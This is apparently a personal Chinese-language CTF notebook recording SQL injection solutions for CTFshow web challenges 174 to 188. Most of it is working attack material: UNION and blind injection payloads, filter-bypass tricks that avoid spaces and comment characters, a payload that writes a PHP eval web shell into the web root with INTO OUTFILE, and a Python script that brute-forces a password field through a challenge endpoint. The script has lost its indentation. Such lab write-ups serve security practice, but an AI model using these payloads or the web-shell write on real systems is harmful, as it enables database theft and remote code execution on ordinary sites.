>
>
SQL注入零散记录
hdxw
做到哪算哪
web174
0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23
flaq{khhefafn-mnnb-lbfn-picc-hnledpbohekq}
flag{300efaf6-566b-4bf6-81cc-064ed8b70e39}
0' union select 1,'<?php eval($_POST["5"]);?>' into outfile '/var/www/html/eval.php' %23不过滤输入过滤输出,都可盲注
web176
不知道为什么
0' or 1%23web177/web178/web179
貌似不能有空格
1'||1%23web180/web181
1' 报错说明单引号可用
1'%23 无数据,说明#被拦截了,其他截断的也不行
1'||'1 那就不绕了,直接引号闭合,但是被limit 1了
0'||username='flag 修改返回结果直接getflagweb182
0'||substr(username,1,1)='f
0'||username<'g'%26%26username>'f
0'||username<'flah'%26%26username>'flaf
0'||id='26web183-188
flag = ""
for i in range(len(flag)+1,50):
llll = len(flag)
for s in "0123456789-abcdefgl{}":
# {'tableName':"`ctfshow_user`where`id`>21&&!(mid(pass,%s,1)<>'%s')"%(i,s)} // user_count = 1;
# {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,1)<>char(%s))"%(i,ord(s))} //user_count = 42; 或可 ASCII
# {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,length(database())/length(database()))<>char(%s))"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} //user_count = 42;
# {'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} // "user_count = 484;" not in
# md5($_POST['password'],true); admin/e58
# username/0 或者 1||1
r = requests.post("http://b75c1072-6b76-4d93-9787-5a3aa91db533.chall.ctf.show/select-waf.php",data={'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])})
t = r.text
# print(t)
if "user_count = 484;" not in t:
flag += s
print(flag)
break
# break
if "}" in flag or llll == len(flag):
break- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论